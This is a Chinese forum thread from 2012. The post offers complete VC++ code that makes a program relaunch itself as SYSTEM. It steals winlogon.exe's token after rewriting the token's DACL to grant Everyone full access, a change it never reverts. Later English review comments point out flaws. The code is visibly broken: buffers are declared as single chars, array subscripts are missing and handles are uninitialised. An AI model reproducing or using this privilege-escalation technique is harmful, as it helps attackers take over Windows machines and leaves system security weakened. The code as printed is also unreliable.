751k8 发表于 2012-4-16 12:49:18

VC++ 提升自身权限为system

#include "stdafx.h"
#include <windows.h>
#include <tlhelp32.h>
#include <Psapi.h>
#pragma comment(lib,"Psapi.lib")
#include "Shellapi.h"
#include <TLHELP32.H>
#include <aclapi.h>

/*
 * Report whether a process matching szProcName is currently running.
 *
 * Despite its name the function terminates nothing: it walks a Toolhelp32
 * process snapshot and returns as soon as one entry matches.
 *
 * szProcName: name to look for.
 * x:          non-zero -> compare against the snapshot's image name
 *             (pe.szExeFile); zero -> open each process and compare against
 *             the path returned by GetModuleFileNameEx.
 * Returns BOOL (as int): TRUE when a match was found, otherwise FALSE.
 */
int ProcessExit(LPCTSTR szProcName,int x)
{
PROCESSENTRY32 pe;
DWORD dwRet;
BOOL bFound = FALSE;
HANDLE hProcess;
/* NOTE(review): declared as a single char, so sizeof(fileName) is 1 and the
 * (LPSTR) cast below converts a char value, not an address; an array
 * dimension was probably lost when the post was rendered. */
char fileName = {0};
HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
/* NOTE(review): CreateToolhelp32Snapshot signals failure with
 * INVALID_HANDLE_VALUE, which is non-zero, so this test never fails. */
if (hSP)
{
pe.dwSize = sizeof(pe);

for (dwRet = Process32First(hSP, &pe);
dwRet;
dwRet = Process32Next(hSP, &pe))
{
   if(x){
    /* lstrcmpi: case-insensitive compare against the image name only */
    if (lstrcmpi( szProcName, pe.szExeFile) == 0)
    {
   bFound = TRUE;
   break;
    }
   }
   else
    {
    hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,FALSE,pe.th32ProcessID);
    if(hProcess)
    {
   /* purpose of the two 1 ms sleeps around the query is not stated */
   Sleep(1);
   GetModuleFileNameEx(hProcess,NULL, (LPSTR)fileName,sizeof(fileName));
   Sleep(1);
   if (lstrcmpi( szProcName, fileName) == 0)
   {
      bFound = TRUE;
      break;
   }
    }
   /* NOTE(review): reached even when OpenProcess returned NULL, and the
    * break on a match skips it, so the matched hProcess is leaked. */
   CloseHandle(hProcess);
   }
}
CloseHandle(hSP);
}
return bFound;
}

/* Function-pointer type with CreateMutexA's signature (SAL-annotated).
 * Nothing in the visible code references it. */
typedef HANDLE (WINAPI *CreateMutexAT)

(
__in_opt LPSECURITY_ATTRIBUTES lpMutexAttributes,
__in   BOOL bInitialOwner,
__in_opt LPCSTR lpName
);


/*
 * Enable the named privilege (the caller passes "SeDebugPrivilege") in the
 * current process token.
 *
 * szPrivilege: privilege name accepted by LookupPrivilegeValue.
 * Returns TRUE when AdjustTokenPrivileges returned success, FALSE on any
 * API failure.
 */
BOOL
EnableDebugPriv( LPCTSTR szPrivilege )
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;

if ( !OpenProcessToken( GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
&hToken ) )
{
return FALSE;
}
if ( !LookupPrivilegeValue( NULL, szPrivilege, &sedebugnameValue ) )
{
CloseHandle( hToken );
return FALSE;
}

tkp.PrivilegeCount = 1;
/* NOTE(review): TOKEN_PRIVILEGES.Privileges is an array; the "[0]"
 * subscript was probably lost in the forum rendering. */
tkp.Privileges.Luid = sedebugnameValue;
tkp.Privileges.Attributes = SE_PRIVILEGE_ENABLED;

/* NOTE(review): AdjustTokenPrivileges reports success even when the
 * privilege is not held by the token (GetLastError() then returns
 * ERROR_NOT_ALL_ASSIGNED), so TRUE here does not prove it was enabled. */
if ( !AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) )
{
CloseHandle( hToken );
return FALSE;
}

/* NOTE(review): hToken is not closed on the success path (handle leak). */
return TRUE;
}


/*
 * Return the process id of the first snapshot entry whose image name equals
 * szProcName (case-insensitive), or 0 when none matches or the snapshot
 * could not be taken.
 *
 * NOTE(review): windows.h already declares a kernel32 function named
 * GetProcessId(HANDLE); in a C translation unit this definition is likely
 * to conflict with that declaration.
 */
DWORD
GetProcessId( LPCTSTR szProcName )
{
PROCESSENTRY32 pe;
DWORD dwPid;
DWORD dwRet;
BOOL bFound = FALSE;

//
// Enumerate processes with the Toolhelp32 functions
//

HANDLE hSP = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
/* NOTE(review): failure is signalled by INVALID_HANDLE_VALUE, not NULL,
 * so this check does not catch a failed snapshot. */
if ( hSP )
{
pe.dwSize = sizeof( pe );

for ( dwRet = Process32First( hSP, &pe );
dwRet;
dwRet = Process32Next( hSP, &pe ) )
{
   //
   // Case-insensitive string compare (the original comment names
   // StrCmpNI, but the code uses lstrcmpi)
   //
   if ( lstrcmpi(szProcName, pe.szExeFile) == 0 )
   {
    dwPid = pe.th32ProcessID;
    bFound = TRUE;
    break;
   }
}

CloseHandle( hSP );

if ( bFound == TRUE )
{
   return dwPid;
}
}

/* NULL (a pointer constant) used as integer 0; the caller tests == NULL */
return NULL;
}


/*
 * Start szProcessName under a duplicate of winlogon.exe's primary token.
 *
 * Sequence as written: enable SeDebugPrivilege; locate WINLOGON.EXE; open
 * the process and its token; merge an Everyone / TOKEN_ALL_ACCESS entry into
 * the token's DACL and write it back with SetKernelObjectSecurity; reopen
 * the token with TOKEN_ALL_ACCESS, duplicate it as a primary token,
 * impersonate it and call CreateProcessAsUser.
 *
 * Security note (defender view): the DACL rewrite on winlogon's token is
 * not reverted in Cleanup, so the Everyone grant outlives this call, and
 * the impersonation begun by ImpersonateLoggedOnUser is never undone with
 * RevertToSelf. The token DACL change and the access to winlogon's token
 * are the observable side effects of this function.
 *
 * szProcessName: mutable command line handed to CreateProcessAsUser.
 * Returns TRUE only when CreateProcessAsUser succeeded, else FALSE.
 *
 * NOTE(review): pi, hToken, hNewToken and hProcess are never initialized,
 * so the CloseHandle calls in Cleanup read indeterminate values on every
 * early-exit path; hToken is also opened a second time without closing the
 * first handle, and pNewDAcl (allocated by SetEntriesInAcl) is never freed.
 */
BOOL CreateSystemProcess( LPTSTR szProcessName )
{
HANDLE hProcess;
HANDLE hToken, hNewToken;
DWORD dwPid;

PACL pOldDAcl = NULL;
PACL pNewDAcl = NULL;
BOOL bDAcl;
BOOL bDefDAcl;
DWORD dwRet;

PACL pSacl = NULL;
PSID pSidOwner = NULL;
PSID pSidPrimary = NULL;
DWORD dwAclSize = 0;
DWORD dwSaclSize = 0;
DWORD dwSidOwnLen = 0;
DWORD dwSidPrimLen = 0;

DWORD dwSDLen;
EXPLICIT_ACCESS ea;
PSECURITY_DESCRIPTOR pOrigSd = NULL;
PSECURITY_DESCRIPTOR pNewSd = NULL;

STARTUPINFO si;
PROCESS_INFORMATION pi;

BOOL bError;

if (!EnableDebugPriv("SeDebugPrivilege"))
{
bError = TRUE;
goto Cleanup;
}

/* GetProcessId returns 0 (spelled NULL) when no such process exists */
if ( ( dwPid = GetProcessId("WINLOGON.EXE") ) == NULL )
{
bError = TRUE;
goto Cleanup;
}

/* MAXIMUM_ALLOWED: request whatever access the caller is granted */
hProcess = OpenProcess( MAXIMUM_ALLOWED, FALSE, dwPid );
if ( hProcess == NULL )
{
bError = TRUE;
goto Cleanup;
}

/* READ_CONTROL | WRITE_DAC: just enough to read and rewrite the DACL */
if ( !OpenProcessToken( hProcess, READ_CONTROL | WRITE_DAC, &hToken ) )
{
bError = TRUE;
goto Cleanup;
}

/* ACE granting Everyone full token access; merged into the DACL below */
ZeroMemory( &ea, sizeof( EXPLICIT_ACCESS ) );
BuildExplicitAccessWithName( &ea,
"Everyone",
TOKEN_ALL_ACCESS,
GRANT_ACCESS,
0 );

/* two-call pattern: first call with size 0 only reports the needed length */
if ( !GetKernelObjectSecurity( hToken,
DACL_SECURITY_INFORMATION,
pOrigSd,
0,
&dwSDLen ) )
{

if ( GetLastError() == ERROR_INSUFFICIENT_BUFFER )
{
   pOrigSd = ( PSECURITY_DESCRIPTOR ) HeapAlloc( GetProcessHeap(),
    HEAP_ZERO_MEMORY,
    dwSDLen );
   if ( pOrigSd == NULL )
   {
    bError = TRUE;
    goto Cleanup;
   }
   
   /* second call fills the self-relative descriptor */
   if ( !GetKernelObjectSecurity( hToken,
    DACL_SECURITY_INFORMATION,
    pOrigSd,
    dwSDLen,
    &dwSDLen ) )
   {
    bError = TRUE;
    goto Cleanup;
   }
}
else
{
   bError = TRUE;
   goto Cleanup;
}
}

if ( !GetSecurityDescriptorDacl( pOrigSd, &bDAcl, &pOldDAcl, &bDefDAcl ) )
{
bError = TRUE;
goto Cleanup;
}


/* new DACL = old DACL + the Everyone ACE built above */
dwRet = SetEntriesInAcl( 1, &ea, pOldDAcl, &pNewDAcl );
if ( dwRet != ERROR_SUCCESS )
{
pNewDAcl = NULL;

bError = TRUE;
goto Cleanup;
}

/* two-call pattern again: sizes of each absolute-SD component are
 * reported first, the buffers allocated, then the conversion is redone */
if ( !MakeAbsoluteSD( pOrigSd,
pNewSd,
&dwSDLen,
pOldDAcl,
&dwAclSize,
pSacl,
&dwSaclSize,
pSidOwner,
&dwSidOwnLen,
pSidPrimary,
&dwSidPrimLen ) )
{

if ( GetLastError() == ERROR_INSUFFICIENT_BUFFER )
{
   pOldDAcl = ( PACL ) HeapAlloc( GetProcessHeap(),
    HEAP_ZERO_MEMORY,
    dwAclSize );
   pSacl = ( PACL ) HeapAlloc( GetProcessHeap(),
    HEAP_ZERO_MEMORY,
    dwSaclSize );
   pSidOwner = ( PSID ) HeapAlloc( GetProcessHeap(),
    HEAP_ZERO_MEMORY,
    dwSidOwnLen );
   pSidPrimary = ( PSID ) HeapAlloc( GetProcessHeap(),
    HEAP_ZERO_MEMORY,
    dwSidPrimLen );
   pNewSd = ( PSECURITY_DESCRIPTOR ) HeapAlloc( GetProcessHeap(),
    HEAP_ZERO_MEMORY,
    dwSDLen );
   
   if ( pOldDAcl == NULL ||
    pSacl == NULL ||
    pSidOwner == NULL ||
    pSidPrimary == NULL ||
    pNewSd == NULL )
   {
    bError = TRUE;
    goto Cleanup;
   }
   
   //
   // Only this second call actually builds the new absolute security
   // descriptor pNewSd; at this point it still carries the original ACL.
   //
   if ( !MakeAbsoluteSD( pOrigSd,
    pNewSd,
    &dwSDLen,
    pOldDAcl,
    &dwAclSize,
    pSacl,
    &dwSaclSize,
    pSidOwner,
    &dwSidOwnLen,
    pSidPrimary,
    &dwSidPrimLen ) )
   {
    bError = TRUE;
    goto Cleanup;
   }
}
else
{
   bError = TRUE;
   goto Cleanup;
}
}

/* swap the merged DACL into the absolute descriptor ... */
if ( !SetSecurityDescriptorDacl( pNewSd, bDAcl, pNewDAcl, bDefDAcl ) )
{
bError = TRUE;
goto Cleanup;
}

/* ... and apply it to the token object; this change is never reverted */
if ( !SetKernelObjectSecurity( hToken, DACL_SECURITY_INFORMATION, pNewSd ) )
{
bError = TRUE;
goto Cleanup;
}

/* reopen with full access now that the DACL permits it
 * (NOTE(review): overwrites the earlier hToken handle without closing it) */
if ( !OpenProcessToken( hProcess, TOKEN_ALL_ACCESS, &hToken ) )
{
bError = TRUE;
goto Cleanup;
}

/* TokenPrimary: the copy must be a primary token to be usable with
 * CreateProcessAsUser */
if ( !DuplicateTokenEx( hToken,
TOKEN_ALL_ACCESS,
NULL,
SecurityImpersonation,
TokenPrimary,
&hNewToken ) )
{
bError = TRUE;
goto Cleanup;
}


ZeroMemory( &si, sizeof( STARTUPINFO ) );
si.cb = sizeof( STARTUPINFO );

/* NOTE(review): return value unchecked and no RevertToSelf anywhere */
ImpersonateLoggedOnUser( hNewToken );

/* NOTE(review): NULL (a pointer constant) is passed for dwCreationFlags */
if ( !CreateProcessAsUser( hNewToken,
NULL,
szProcessName,
NULL,
NULL,
FALSE,
NULL, //NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE,
NULL,
NULL,
&si,
&pi ) )
{
bError = TRUE;
goto Cleanup;
}

bError = FALSE;

Cleanup:
/* HeapFree(NULL) guards are redundant but harmless */
if ( pOrigSd )
{
HeapFree( GetProcessHeap(), 0, pOrigSd );
}
if ( pNewSd )
{
HeapFree( GetProcessHeap(), 0, pNewSd );
}
if ( pSidPrimary )
{
HeapFree( GetProcessHeap(), 0, pSidPrimary );
}
if ( pSidOwner )
{
HeapFree( GetProcessHeap(), 0, pSidOwner );
}
if ( pSacl )
{
HeapFree( GetProcessHeap(), 0, pSacl );
}
if ( pOldDAcl )
{
HeapFree( GetProcessHeap(), 0, pOldDAcl );
}

/* NOTE(review): these handles are uninitialized on early-exit paths */
CloseHandle( pi.hProcess );
CloseHandle( pi.hThread );
CloseHandle( hToken );
CloseHandle( hNewToken );
CloseHandle( hProcess );

if ( bError )
{
return FALSE;
}

return TRUE;
}





/*
 * Entry point: fetches this executable's path and relaunches it through
 * CreateSystemProcess, then sleeps one second and exits.
 *
 * NOTE(review): strInstallModule is declared as a single char, so
 * sizeof(strInstallModule) is 1 and both memset and GetModuleFileName are
 * given a one-byte buffer (an array dimension was probably lost in the
 * forum rendering). The CreateSystemProcess result is ignored, and nothing
 * in the visible code stops the relaunched copy from doing the same again.
 */
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR   lpCmdLine,
                     int       nCmdShow)
{



char strInstallModule;
memset(strInstallModule, 0, sizeof(strInstallModule));
GetModuleFileName(NULL,strInstallModule,sizeof(strInstallModule));

CreateSystemProcess(strInstallModule);
/* purpose of the one-second delay before exiting is not stated */
Sleep(1000);
return 0;
}



以上是提升自身权限为system

完整代码 可以提升自己为system

lwb_hao 发表于 2012-9-9 21:12:50

想钱钱的疯子!!!

ikkyphoenix 发表于 2013-7-9 17:41:08

多谢分享!

onflypuma 发表于 2013-11-27 18:09:56

谢谢分享!{:5_193:}